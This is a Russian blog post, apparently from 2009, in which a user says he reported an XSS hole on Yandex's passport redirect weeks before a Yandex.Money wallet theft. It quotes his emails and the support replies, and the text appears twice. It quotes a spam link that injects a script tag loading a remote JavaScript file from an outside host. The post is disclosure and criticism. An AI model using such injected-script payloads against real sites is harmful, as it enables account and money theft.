Навеяно вчерашним топиком Как увели мои деньги с кошелька Яндекса. Часть 3. XSS
Маленькое предисловие тем, кто не читал тот пост. У человека украли деньги с его кошелька на Яндекс.Деньги. Разбираясь во всей этой неприятной истории, пользователь убеждается, что Яндекс не всесилен и у них на сайте имеется замечательная XSS.
Прочитав об этом, я, скажем мягко, немного удивился, но не от того, что вдруг активная XSS и вдруг у такой большой компании, как яндекс… нет, не от этого. Удивился я тому, что лично сообщал в компанию об этой дырке 20 дней назад и мне сказали, что меры применим ASAP.
читать дальше…
Линк на враждебный скрипт был 100% тот же самый.
Мое письмо в яндекс гласило:
Все это напоминает активную XSS — я сам не проверял, но по структуре похоже)
через 2 ДНЯ мне приходит от яндекса вот такой ответ,
для тех, кто не в курсе — это шаблонная отмазка, которую яндекс шлют всем, кто жалуется на спам.
Я написал им повторно и попросил раскрыть глаза.
ответ уже был более адекватным:
Переписка эта датируется 20-м октября. Номер тикета: Ticket#200910199001067
Простите, но для компании, которая распоряжается чужими деньгами (имею ввиду yandex.money), такоераспиздяйство отношение к вопросам безопасности просто недопустимо.
P.S. Отдельно хочу сказать, что не смотря ни на что, лично я испытываю уважение к яндексу, ведь продолжать активно развиваться на рынке, где 95% аналогичных компаний в мировом масштабе уже ушли в небытие — это действительно заслуживает уважения.
Маленькое предисловие тем, кто не читал тот пост. У человека украли деньги с его кошелька на Яндекс.Деньги. Разбираясь во всей этой неприятной истории, пользователь убеждается, что Яндекс не всесилен и у них на сайте имеется замечательная XSS.
Прочитав об этом, я, скажем мягко, немного удивился, но не от того, что вдруг активная XSS и вдруг у такой большой компании, как яндекс… нет, не от этого. Удивился я тому, что лично сообщал в компанию об этой дырке 20 дней назад и мне сказали, что меры применим ASAP.
читать дальше…
Линк на враждебный скрипт был 100% тот же самый.
Мое письмо в яндекс гласило:
SUBJ: Похоже на дырку XSS на вашем сайте"'
Добрый вечер.
Только что мне пришёл спам и при переходе по ссылке внутри письма, я обнаружил
код такого вида:
src='http://passport.yandex.ru/passport?mode=mycookie&submode=choice&retpath=http://slovari.yandex.ru/%22%3CSCRIPT
> type=text/javascript src=http://httpz.ru/zakazchikgo.js>
Все это напоминает активную XSS — я сам не проверял, но по структуре похоже)
через 2 ДНЯ мне приходит от яндекса вот такой ответ,
Мы не проводили подобных рассылок и не имеем к этой акции никакого отношения.
Это мошенники, которые пытаются выманить у Вас деньги или завладеть
регистрационными данными. Перешлите, пожалуйста, это мошенническое письмо нам
кнопкой «Переслать». Не забудьте поставить галочку «Добавить исходное письмо в
виде вложения».
для тех, кто не в курсе — это шаблонная отмазка, которую яндекс шлют всем, кто жалуется на спам.
Я написал им повторно и попросил раскрыть глаза.
ответ уже был более адекватным:
Здравствуйте, Роман!
Извините, я Вас не совсем понял и сразу хочу извиниться за то, что ответили
через двое суток.
Данный код был передан службе безопасности. Они примут меры.
Благодарим за Ваше письмо.
Переписка эта датируется 20-м октября. Номер тикета: Ticket#200910199001067
Простите, но для компании, которая распоряжается чужими деньгами (имею ввиду yandex.money), такое
P.S. Отдельно хочу сказать, что не смотря ни на что, лично я испытываю уважение к яндексу, ведь продолжать активно развиваться на рынке, где 95% аналогичных компаний в мировом масштабе уже ушли в небытие — это действительно заслуживает уважения.